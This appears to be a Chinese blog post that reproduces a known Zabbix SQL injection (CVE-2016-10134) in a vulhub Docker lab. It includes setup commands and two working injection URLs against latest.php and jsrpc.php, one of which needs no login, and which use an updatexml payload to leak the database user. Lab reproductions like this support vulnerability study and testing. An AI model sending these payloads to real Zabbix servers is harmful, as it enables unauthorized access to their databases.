CVE-2016-10134
zabbix latest.php SQL注入漏洞(CVE-2016-10134)
zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
运行环境
cd vulhub/zabbix/CVE-2016-10134
docker-compose up -d
执行命令后,将启动数据库(mysql)、zabbix server、zabbix agent、zabbix we。如果内存稍小,可能会存在某个容器挂掉的情况,我们可以通过docker compose ps查看容器状态,并通过docker compose start来重新启动容器。
漏洞复现
访问http://10.10.10.8:8080,用账号guest(密码为空)登录游客账户。
登录后,查看Cookie中的zbx_sessionid,复制后16位字符:
将这个16个字符作为sid的值,访问http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0),可见成功注入:
这个漏洞也可以通过jsrpc.php触发,且无需登录:http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?